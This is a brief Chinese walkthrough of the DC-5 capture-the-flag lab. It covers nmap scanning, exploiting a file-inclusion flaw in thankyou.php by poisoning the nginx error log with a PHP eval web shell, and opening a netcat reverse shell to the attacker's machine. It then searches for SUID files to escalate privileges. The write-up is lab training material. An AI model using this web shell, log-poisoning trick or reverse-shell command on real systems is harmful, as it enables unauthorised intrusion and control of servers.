DC-5靶场实战模拟

信息收集

端口和网段信息:使用nmap扫描
//扫描网段中存货的主机
nmap -sP 192.168.10.0/24
//进行对主机进行猜测-》发现接口:80存活
nmap -sV 192.168.10.245
目录信息 :使用dirbuster
指纹信息

 


找漏洞

发现web 中contact有提交界面进行尝试

 发现页脚时间随着刷新变化,可能有文件包含漏洞

 

 猜测传参的key为’file‘

注入一句话木马:

<?php eval($_POST['pass']);?>

 使用工具进行连接

http://192.168.10.145/thankyou.php?file=/var/log/nginx/error.log
/var/log/nginx/error.log 为nginx报错日志路径

使用nc连接kali

kali中运行,持续监听1234端口
nc -lvvp 1234

在连接靶机的工具中使用,连接kali
nc -e /bin/bash 192.168.10.223 1234

查找dc-5中的特殊文件

find / -perm -u=s -type f 2>/dev/null

查找对应插件payload进行提权 

searchsploit scree 4.5.0

 

 

 

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值